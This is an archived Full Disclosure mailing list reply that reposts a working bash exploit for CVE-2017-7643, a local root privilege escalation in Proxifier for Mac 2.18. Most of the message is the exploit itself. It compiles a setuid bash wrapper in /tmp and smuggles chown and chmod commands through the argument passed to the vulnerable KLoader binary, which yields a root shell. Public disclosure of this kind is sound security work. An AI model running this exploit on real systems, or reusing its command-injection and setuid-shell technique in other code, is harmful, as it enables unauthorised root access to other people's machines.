[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18

To: fulldisclosure@xxxxxxxxxxxx
Subject: Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18
From: "Mark Wadham" <fd@xxxxxx>
Date: Tue, 11 Apr 2017 11:24:33 +0100

Sorry, the exploit code got mangled :S

-------------------------
#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18                                           #
#####################################################################
# by m4rkw                                                          #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c

/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel/tmp/a ; chmod 4755 /tmp/a'

/tmp/a
-------------------------

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

References:
- [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18
  - From: Mark Wadham

Prev by Date: [FD] Proxifier for Mac 2.19 local root privesc
Next by Date: [FD] DefenseCode ThunderScan SAST Advisory: WordPress Tribulant Slideshow Gallery Plugin - Cross-Site Scripting Vulnerabilities
Previous by thread: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18
Next by thread: [FD] SSD Advisory – Horde Groupware Webmail Multiple Remote Code Execution Vulnerabilities
Index(es):
- Date
- Thread